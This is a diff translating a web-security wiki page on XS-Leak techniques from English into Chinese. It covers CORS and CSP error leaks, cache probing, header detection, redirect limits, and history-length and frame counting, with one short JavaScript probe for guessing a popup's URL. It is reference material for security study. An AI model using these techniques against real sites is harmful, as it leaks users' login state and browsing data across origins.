+- **总结:** 在安全声明 (SA) 中，CORS 错误消息无意中暴露了重定向请求的完整 URL。
+- **代码示例**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **Summary:** In Security Assertions (SA), CORS error messages inadvertently expose the full URL of redirected requests.
-- **Code Example**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
+此技术使攻击者能够通过利用 Webkit 基于浏览器处理 CORS 请求的方式，**提取跨源站点重定向的目标**。具体而言，当向目标站点发送 **CORS 启用请求**，该站点根据用户状态发出重定向，而浏览器随后拒绝该请求时，**重定向目标的完整 URL** 会在错误消息中披露。此漏洞不仅揭示了重定向的事实，还暴露了重定向的端点及其可能包含的任何 **敏感查询参数**。
 
-This technique enables an attacker to **extract the destination of a cross-origin site's redirect** by exploiting how Webkit-based browsers handle CORS requests. Specifically, when a **CORS-enabled request** is sent to a target site that issues a redirect based on user state and the browser subsequently denies the request, the **full URL of the redirect's target** is disclosed within the error message. This vulnerability not only reveals the fact of the redirect but also exposes the redirect's endpoint and any **sensitive query parameters** it may contain.
+### SRI 错误
 
-### SRI Error
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
+- **总结:** 在安全声明 (SA) 中，CORS 错误消息无意中暴露了重定向请求的完整 URL。
+- **代码示例**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
-- **Summary:** In Security Assertions (SA), CORS error messages inadvertently expose the full URL of redirected requests.
-- **Code Example**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
+攻击者可以利用 **详细的错误消息** 来推断跨源响应的大小。这是由于子资源完整性 (SRI) 的机制，该机制使用完整性属性来验证从 CDN 获取的资源是否未被篡改。为了使 SRI 在跨源资源上工作，这些资源必须是 **CORS 启用的**；否则，它们不受完整性检查。在安全声明 (SA) 中，类似于 CORS 错误 XS-Leak，当带有完整性属性的 fetch 请求失败时，可以捕获错误消息。攻击者可以故意 **触发此错误**，通过将 **虚假的哈希值** 分配给任何请求的完整性属性。在 SA 中，结果错误消息无意中揭示了请求资源的内容长度。这一信息泄露使攻击者能够辨别响应大小的变化，为复杂的 XS-Leak 攻击铺平了道路。
 
-An attacker can exploit **verbose error messages** to deduce the size of cross-origin responses. This is possible due to the mechanism of Subresource Integrity (SRI), which uses the integrity attribute to validate that resources fetched, often from CDNs, haven't been tampered with. For SRI to work on cross-origin resources, these must be **CORS-enabled**; otherwise, they're not subject to integrity checks. In Security Assertions (SA), much like the CORS error XS-Leak, an error message can be captured after a fetch request with an integrity attribute fails. Attackers can deliberately **trigger this error** by assigning a **bogus hash value** to the integrity attribute of any request. In SA, the resulting error message inadvertently reveals the content length of the requested resource. This information leakage allows an attacker to discern variations in response size, paving the way for sophisticated XS-Leak attacks.
+### CSP 违规/检测
 
-### CSP Violation/Detection
+- **包含方法**: 弹出窗口
+- **可检测差异**: 状态码
+- **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
+- **总结:** 如果我们访问的受害者网站尝试重定向到不同的域，CSP 将触发可检测的错误。
+- **代码示例**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Status Code
-- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
-- **Summary:** Allowing only the victims website in the CSP if we accessed it tries to redirect to a different domain the CSP will trigger a detectable error.
-- **Code Example**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
+XS-Leak 可以使用 CSP 检测跨源站点是否重定向到不同的源。此泄漏可以检测重定向，但此外，重定向目标的域也会泄漏。此攻击的基本思路是 **允许攻击者站点上的目标域**。一旦向目标域发出请求，它 **重定向** 到一个跨源域。**CSP 阻止** 对其的访问并创建一个 **违规报告作为泄漏技术**。根据浏览器的不同，**此报告可能泄漏重定向的目标位置**。\
+现代浏览器不会指示重定向到的 URL，但您仍然可以检测到跨源重定向已被触发。
 
-A XS-Leak can use the CSP to detect if a cross-origin site was redirected to a different origin. This leak can detect the redirect, but additionally, the domain of the redirect target leaks. The basic idea of this attack is to **allow the target domain on the attacker site**. Once a request is issued to the target domain, it **redirects** to a cross-origin domain. **CSP blocks** the access to it and creates a **violation report used as a leak technique**. Depending on the browser, **this report may leak the target location of the redirect**.\
-Modern browsers won't indicate the URL it was redirected to, but you can still detect that a cross-origin redirect was triggered.
+### 缓存
 
-### Cache
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 页面内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
+- **总结:** 从缓存中清除文件。打开目标页面检查文件是否存在于缓存中。
+- **代码示例:**
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Page Content
-- **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
-- **Summary:** Clear the file from the cache. Opens target page checks if the file is present in the cache.
-- **Code Example:**
+浏览器可能为所有网站使用一个共享缓存。无论其来源如何，都可以推断目标页面是否 **请求了特定文件**。
 
-Browsers might use one shared cache for all websites. Regardless of their origin, it is possible to deduct whether a target page has **requested a specific file**.
+如果一个页面仅在用户登录时加载图像，您可以 **使资源失效**（以便如果它被缓存则不再缓存，更多信息链接），**执行请求** 以加载该资源，并尝试使用 **错误请求** 加载该资源（例如，使用过长的 referer 头）。如果资源加载 **没有触发任何错误**，则是因为它被 **缓存**。
 
-If a page loads an image only if the user is logged in, you can **invalidate** the **resource** (so it's no longer cached if it was, see more info links), **perform a request** that could load that resource and try to load the resource **with a bad request** (e.g. using an overlong referer header). If the resource load **didn't trigger any error**, it's because it was **cached**.
+### CSP 指令
 
-### CSP Directive
+- **包含方法**: 框架
+- **可检测差异**: Header
+- **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
+- **总结:** CSP 头指令可以通过 CSP iframe 属性进行探测，揭示策略细节。
+- **代码示例**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-- **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
-- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
-- **Summary:** CSP header directives can be probed using the CSP iframe attribute, revealing policy details.
-- **Code Example**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
-
-A novel feature in Google Chrome (GC) allows web pages to **propose a Content Security Policy (CSP)** by setting an attribute on an iframe element, with policy directives transmitted along with the HTTP request. Normally, the embedded content must **authorize this via an HTTP header**, or an **error page is displayed**. However, if the iframe is already governed by a CSP and the newly proposed policy isn't more restrictive, the page will load normally. This mechanism opens a pathway for an attacker to **detect specific CSP directives** of a cross-origin page by identifying the error page. Although this vulnerability was marked as fixed, our findings reveal a **new leak technique** capable of detecting the error page, suggesting that the underlying problem was never fully addressed.
+Google Chrome (GC) 中的一个新功能允许网页通过在 iframe 元素上设置属性来 **提议内容安全策略 (CSP)**，并将策略指令与 HTTP 请求一起传输。通常，嵌入的内容必须 **通过 HTTP 头进行授权**，否则将 **显示错误页面**。然而，如果 iframe 已经受到 CSP 的管理，并且新提议的策略不更严格，则页面将正常加载。此机制为攻击者提供了一条途径，通过识别错误页面来 **检测跨源页面的特定 CSP 指令**。尽管此漏洞被标记为已修复，但我们的发现揭示了一种 **新的泄漏技术**，能够检测错误页面，表明根本问题从未完全解决。
 
 ### **CORP**
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Header
-- **More info**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
-- **Summary:** Resources secured with Cross-Origin Resource Policy (CORP) will throw an error when fetched from a disallowed origin.
-- **Code Example**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
+- **总结:** 使用跨源资源策略 (CORP) 保护的资源在从不允许的源获取时会抛出错误。
+- **代码示例**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
-The CORP header is a relatively new web platform security feature that when set b**locks no-cors cross-origin requests to the given resource**. The presence of the header can be detected, because a resource protected with CORP will **throw an error when fetched**.
+CORP 头是一个相对较新的网络平台安全特性，当设置时 **阻止对给定资源的无 CORS 跨源请求**。可以检测到该头的存在，因为受 CORP 保护的资源在被获取时会 **抛出错误**。
 
 ### CORB
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
-- **Summary**: CORB can allow attackers to detect when the **`nosniff` header is present** in the request.
-- **Code Example**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
+- **包含方法**: HTML 元素
+- **可检测差异**: Headers
+- **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
+- **总结**: CORB 可以让攻击者检测到请求中 **`nosniff` 头的存在**。
+- **代码示例**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
 
-Check the link for more information about the attack.
+查看链接以获取有关攻击的更多信息。
 
-### CORS error on Origin Reflection misconfiguration <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
+### CORS 错误在源反射错误配置上 <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Headers
-- **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
-- **Summary**: If the Origin header is reflected in the header `Access-Control-Allow-Origin` it's possible to check if a resource is in the cache already.
-- **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
+- **包含方法**: Fetch API
+- **可检测差异**: Headers
+- **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
+- **总结**: 如果 Origin 头在 `Access-Control-Allow-Origin` 头中被反射，则可以检查资源是否已经在缓存中。
+- **代码示例**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-In case the **Origin header** is being **reflected** in the header `Access-Control-Allow-Origin` an attacker can abuse this behaviour to try to **fetch** the **resource** in **CORS** mode. If an **error** **isn't** triggered, it means that it was **correctly retrieved form the web**, if an error is **triggered**, it's because it was **accessed from the cache** (the error appears because the cache saves a response with a CORS header allowing the original domain and not the attackers domain)**.**\
-Note that if the origin isn't reflected but a wildcard is used (`Access-Control-Allow-Origin: *`) this won't work.
+如果 **Origin 头** 在 `Access-Control-Allow-Origin` 头中被 **反射**，攻击者可以利用这种行为尝试 **以 CORS 模式获取** **资源**。如果 **没有** 触发 **错误**，则意味着它是 **正确地从网络获取的**；如果触发了错误，则是因为它是 **从缓存中访问的**（错误出现是因为缓存保存了一个允许原始域而不是攻击者域的 CORS 头的响应）。\
+请注意，如果原点没有被反射，但使用了通配符 (`Access-Control-Allow-Origin: *`)，则此方法将无效。
 
-## Readable Attributes Technique
+## 可读属性技术
 
-### Fetch Redirect
+### Fetch 重定向
 
-- **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Status Code
-- **More info**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
-- **Summary:** GC and SA allow to check the response’s type (opaque-redirect) after the redirect is finished.
-- **Code Example**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
+- **包含方法**: Fetch API
+- **可检测差异**: 状态码
+- **更多信息**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
+- **总结:** GC 和 SA 允许在重定向完成后检查响应的类型 (opaque-redirect)。
+- **代码示例**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
 
-Submitting a request using the Fetch API with `redirect: "manual"` and other params, it's possible to read the `response.type` attribute and if it's equals to `opaqueredirect` then the response was a redirect.
+使用 Fetch API 提交请求，设置 `redirect: "manual"` 和其他参数，可以读取 `response.type` 属性，如果它等于 `opaqueredirect`，则响应是一个重定向。
 
 ### COOP
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Header
-- **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
-- **Summary:** Pages safeguarded by Cross-Origin Opener Policy (COOP) prevent access from cross-origin interactions.
-- **Code Example**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
+- **包含方法**: 弹出窗口
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
+- **总结:** 受跨源打开策略 (COOP) 保护的页面防止跨源交互的访问。
+- **代码示例**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-An attacker is capable of deducing the presence of the Cross-Origin Opener Policy (COOP) header in a cross-origin HTTP response. COOP is utilized by web applications to hinder external sites from obtaining arbitrary window references. The visibility of this header can be discerned by attempting to access the **`contentWindow` reference**. In scenarios where COOP is applied conditionally, the **`opener` property** becomes a telltale indicator: it's **undefined** when COOP is active, and **defined** in its absence.
+攻击者能够推断跨源 HTTP 响应中跨源打开策略 (COOP) 头的存在。COOP 被网络应用程序用于阻止外部站点获取任意窗口引用。可以通过尝试访问 **`contentWindow` 引用** 来识别此头的可见性。在 COOP 有条件应用的情况下，**`opener` 属性** 成为一个明显的指示器：当 COOP 活动时，它是 **未定义的**，而在没有 COOP 的情况下是 **定义的**。
 
-### URL Max Length - Server Side
+### URL 最大长度 - 服务器端
 
-- **Inclusion Methods**: Fetch API, HTML Elements
-- **Detectable Difference**: Status Code / Content
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **Summary:** Detect differences in responses because of the redirect response length migt be too large that the server replays with an error and an alert is generated.
-- **Code Example**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
+- **包含方法**: Fetch API, HTML 元素
+- **可检测差异**: 状态码 / 内容
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
+- **总结:** 检测响应中的差异，因为重定向响应长度可能过大，服务器会回复错误并生成警报。
+- **代码示例**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
-If a server-side redirect uses **user input inside the redirection** and **extra data**. It's possible to detect this behaviour because usually **servers** has a **limit request length**. If the **user data** is that **length - 1**, because the **redirect** is using **that data** and **adding** something **extra**, it will trigger an **error detectable via Error Events**.
+如果服务器端重定向使用 **用户输入作为重定向的一部分** 和 **额外数据**。可以检测到这种行为，因为通常 **服务器** 有 **请求长度限制**。如果 **用户数据** 是 **长度 - 1**，因为 **重定向** 使用了 **该数据** 并 **添加** 了一些 **额外内容**，则会触发一个 **可通过错误事件检测到的错误**。
 
-If you can somehow set cookies to a user, you can also perform this attack by **setting enough cookies** ([**cookie bomb**](hacking-with-cookies/cookie-bomb.md)) so with the **response increased size** of the **correct response** an **error** is triggered. In this case, remember that is you trigger this request from a same site, `<script>` will automatically send the cookies (so you can check for errors).\
-An example of the **cookie bomb + XS-Search** can be found in the Intended solution of this writeup: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
+如果您可以以某种方式将 cookies 设置给用户，您还可以通过 **设置足够的 cookies** ([**cookie bomb**](hacking-with-cookies/cookie-bomb.md)) 来执行此攻击，因此 **正确响应的响应大小增加** 会触发一个 **错误**。在这种情况下，请记住，如果您从同一站点触发此请求，`<script>` 将自动发送 cookies（因此您可以检查错误）。\
+关于 **cookie bomb + XS-Search** 的示例可以在此写作的意图解决方案中找到: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
-`SameSite=None` or to be in the same context is usually needed for this type of attack.
+`SameSite=None` 或处于相同上下文通常是此类攻击所需的。
 
-### URL Max Length - Client Side
+### URL 最大长度 - 客户端
 
-- **Inclusion Methods**: Pop-ups
-- **Detectable Difference**: Status Code / Content
-- **More info**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-- **Summary:** Detect differences in responses because of the redirect response length might too large for a request that a difference can be noticed.
-- **Code Example**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
+- **包含方法**: 弹出窗口
+- **可检测差异**: 状态码 / 内容
+- **更多信息**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
+- **总结:** 检测响应中的差异，因为重定向响应长度可能过大，以至于可以注意到差异。
+- **代码示例**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
 
-According to [Chromium documentation](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length), Chrome's maximum URL length is 2MB.
+根据 [Chromium 文档](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)，Chrome 的最大 URL 长度为 2MB。
 
-> In general, the _web platform_ does not have limits on the length of URLs (although 2^31 is a common limit). _Chrome_ limits URLs to a maximum length of **2MB** for practical reasons and to avoid causing denial-of-service problems in inter-process communication.
+> 一般来说，_web 平台_ 对 URL 的长度没有限制（尽管 2^31 是一个常见限制）。_Chrome_ 将 URL 限制为最大长度 **2MB**，出于实际原因并避免在进程间通信中造成拒绝服务问题。
 
-Therefore if the **redirect URL responded is larger in one of the cases**, it's possible to make it redirect with a **URL larger than 2MB** to hit the **length limit**. When this happens, Chrome shows an **`about:blank#blocked`** page.
+因此，如果 **重定向 URL 的响应在某些情况下更大**，则可以使其重定向到 **大于 2MB 的 URL** 以达到 **长度限制**。当发生这种情况时，Chrome 会显示 **`about:blank#blocked`** 页面。
 
-The **noticeable difference**, is that if the **redirect** was **completed**, `window.origin` throws an **error** because a cross origin cannot access that info. However, if the **limit** was \*\*\*\* hit and the loaded page was **`about:blank#blocked`** the window's **`origin`** remains that of the **parent**, which is an **accessible information.**
+**显著差异** 是，如果 **重定向** 已 **完成**，`window.origin` 会抛出 **错误**，因为跨源无法访问该信息。然而，如果 **限制** 被 \*\*\*\* 达到并且加载的页面是 **`about:blank#blocked`**，则窗口的 **`origin`** 保持为 **父级** 的值，这是一个 **可访问的信息**。
 
-All the extra info needed to reach the **2MB** can be added via a **hash** in the initial URL so it will be **used in the redirect**.
+所有达到 **2MB** 所需的额外信息可以通过初始 URL 中的 **哈希** 添加，以便在重定向中 **使用**。
 
 {{#ref}}
 xs-search/url-max-length-client-side.md
 {{#endref}}
 
-### Max Redirects
+### 最大重定向
 
-- **Inclusion Methods**: Fetch API, Frames
-- **Detectable Difference**: Status Code
-- **More info**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76)
-- **Summary:** User the browser's redirect limit to ascertain the occurrence of URL redirections.
-- **Code Example**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
+- **包含方法**: Fetch API, 框架
+- **可检测差异**: 状态码
+- **更多信息**: [https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3_0_76)
+- **总结:** 利用浏览器的重定向限制来确定 URL 重定向的发生。
+- **代码示例**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-If the **max** number of **redirects** to follow of a browser is **20**, an attacker could try to load his page with **19 redirects** and finally **send the victim** to the tested page. If an **error** is triggered, then the page was trying to **redirect the victim**.
+如果浏览器的 **最大** 重定向次数为 **20**，攻击者可以尝试用 **19 次重定向** 加载他的页面，最后 **将受害者** 发送到测试页面。如果 **触发了错误**，则页面试图 **重定向受害者**。
 
-### History Length
+### 历史长度
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Redirects
-- **More info**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
-- **Summary:** JavaScript code manipulates the browser history and can be accessed by the length property.
-- **Code Example**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 重定向
+- **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
+- **总结:** JavaScript 代码操纵浏览器历史，可以通过长度属性访问。
+- **代码示例**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
 
-The **History API** allows JavaScript code to manipulate the browser history, which **saves the pages visited by a user**. An attacker can use the length property as an inclusion method: to detect JavaScript and HTML navigation.\
-**Checking `history.length`**, making a user **navigate** to a page, **change** it **back** to the same-origin and **checking** the new value of **`history.length`**.
+**历史 API** 允许 JavaScript 代码操纵浏览器历史，**保存用户访问的页面**。攻击者可以使用长度属性作为包含方法：检测 JavaScript 和 HTML 导航。\
+**检查 `history.length`**，使用户 **导航** 到一个页面，**返回** 到同源并 **检查** 新的 **`history.length`** 值。
 
-### History Length with same URL
+### 同一 URL 的历史长度
 
-- **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: If URL is the same as the guessed one
-- **Summary:** It's possible to guess if the location of a frame/popup is in an specific URL abusing the history length.
-- **Code Example**: Below
-
-An attacker could use JavaScript code to **manipulate the frame/pop-up location to a guessed one** and **immediately** **change it to `about:blank`**. If the history length increased it means the URL was correct and it had time to **increase because the URL isn't reloaded if it's the same**. If it didn't increased it means it **tried to load the guessed URL** but because we **immediately after** loaded **`about:blank`**, the **history length did never increase** when loading the guessed url.
+- **包含方法**: 框架, 弹出窗口
+- **可检测差异**: 如果 URL 与猜测的 URL 相同
+- **总结:** 可以通过历史长度的滥用来猜测框架/弹出窗口的位置是否在特定 URL 中。
+- **代码示例**: 以下
 
+攻击者可以使用 JavaScript 代码 **操纵框架/弹出窗口的位置到猜测的 URL**，并 **立即** **更改为 `about:blank`**。如果历史长度增加，则意味着 URL 是正确的，并且有时间 **增加，因为如果 URL 相同则不会重新加载**。如果没有增加，则意味着它 **尝试加载猜测的 URL**，但因为我们 **立即之后** 加载了 **`about:blank`**，所以 **历史长度在加载猜测的 URL 时从未增加**。
 ```javascript
 async function debug(win, url) {
-  win.location = url + "#aaa"
-  win.location = "about:blank"
-  await new Promise((r) => setTimeout(r, 500))
-  return win.history.length
+win.location = url + "#aaa"
+win.location = "about:blank"
+await new Promise((r) => setTimeout(r, 500))
+return win.history.length
 }
 
 win = window.open("https://example.com/?a=b")
@@ -690,66 +683,65 @@ win = window.open("https://example.com/?a=b")
 await new Promise((r) => setTimeout(r, 2000))
 console.log(await debug(win, "https://example.com/?a=b"))
 ```
-
 ### Frame Counting
 
 - **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
-- **Summary:** Evaluate the quantity of iframe elements by inspecting the `window.length` property.
+- **Summary:** 通过检查 `window.length` 属性来评估 iframe 元素的数量。
 - **Code Example**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
 
-Counting the **number of frames in a web** opened via `iframe` or `window.open` might help to identify the **status of the user over that page**.\
-Moreover, if the page has always the same number of frames, checking **continuously** the number of frames might help to identify a **pattern** that might leak info.
+计算通过 `iframe` 或 `window.open` 打开的 **网页中的帧数** 可能有助于识别 **用户在该页面上的状态**。\
+此外，如果页面始终具有相同数量的帧，**持续** 检查帧数可能有助于识别可能泄露信息的 **模式**。
 
-An example of this technique is that in chrome, a **PDF** can be **detected** with **frame counting** because an `embed` is used internally. There are [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) that allow some control over the content such as `zoom`, `view`, `page`, `toolbar` where this technique could be interesting.
+这种技术的一个例子是，在 Chrome 中，**PDF** 可以通过 **帧计数** 被 **检测**，因为内部使用了 `embed`。有一些 [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113) 允许对内容进行一些控制，例如 `zoom`、`view`、`page`、`toolbar`，在这种情况下，这种技术可能会很有趣。
 
 ### HTMLElements
 
 - **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
-- **Summary:** Read the leaked value to distinguish between 2 possible states
+- **Summary:** 读取泄露的值以区分两种可能的状态
